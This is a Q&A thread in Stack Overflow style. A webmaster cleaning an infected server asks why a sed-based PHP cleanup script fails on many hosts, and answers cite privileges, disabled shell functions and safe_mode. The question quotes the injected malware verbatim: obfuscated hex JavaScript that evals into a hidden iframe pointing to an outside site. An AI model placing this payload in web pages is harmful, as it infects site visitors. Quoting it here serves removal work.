# Why some servers can't run SED commands?

Tags: php, sed

Recently I've been trying to fix a slew of viruses on my server which I suspect is due to the Blackhole toolkit. It appends a js-script to the end of index.php and .html files which looks like this..

```
<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6578706c6f726574726176656c6e757273696e672e636f6d2f6e6577732e7068703f74703d66646661336165353965343464313930222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>
```

It's a encoded version of the standard iframe virus. I've been trying to remove it by running a php script like the one below. (which was a solution from stack overflow).

```
$dir = "./";

$removejs = `find $dir -name "*.php" -type f |xargs sed -i '<script>var t=.*eval.*script>##g' 2>&1`;
```

The problem is, the script works for some servers while others just seem to have no effect. Does anyone know why? I've tried it on at least 10 separate webhosts. The script only runs successfully on about 3 hosts. The rest just doesn't do anything. What settings do I need to change ?

Appreciate any help I can get. Thanks !

Comment: permission on php files?

Comment: Havn't you tried to run shell script via ssh?

Comment: It's definitely not permissions and I don't have ssh for some accounts.

Comment: is it possible that some machines don't have GNU sed, and hence no `-i`?

Answer (score 1, accepted):

1. If you're running this script right using http request, i.e. it gets runned by webserver with privileges of user like `nobody` or `apache` - then `sed -i` command used in this script just can't change anything in the files that `find` founds due to insufficient privileges.
2. Your PHP installation might have backticks and/or any other form of command execution disabled, as it is usually a direct security threat (using `safe_mode`, using PHP suhosin patch directives, etc).

Your best bet would be checking webserver logs on hosts that haven't executed this script.

Comment: 3. Virus could have included a privilege escalation exploit that eventually replaces standard shell commands with ones that re-infect files

Comment: I guess there is no simple answer then ? I'll go dig up the logs and go thru it. Thanks for the help guys.

Comment: Technically, if your server was *really* hit by a virus, the only way to make sure that it wasn't rooted and exploited since then is a full reinstallation. Having an instance of your web server running host in a virtual machine / container really helps in this case: you can get fresh copy of virtual machine in a jiffy.

Answer (score 1):

Some of the hosts you're using probably have shell functions (`exec`, `shell_exec`, `system`, etc.) disabled, possibly via PHP's infamous `safe_mode` configuration option. You will need to either rewrite the script in pure PHP, or find another way to strip out the inserted content.

Comment: safe_mode is enabled for some of the hosts but not all of those which the script can't run on. Perhaps it may be a combination of settings. I tried rewriting using preg_replace but it seems to need 777 to work.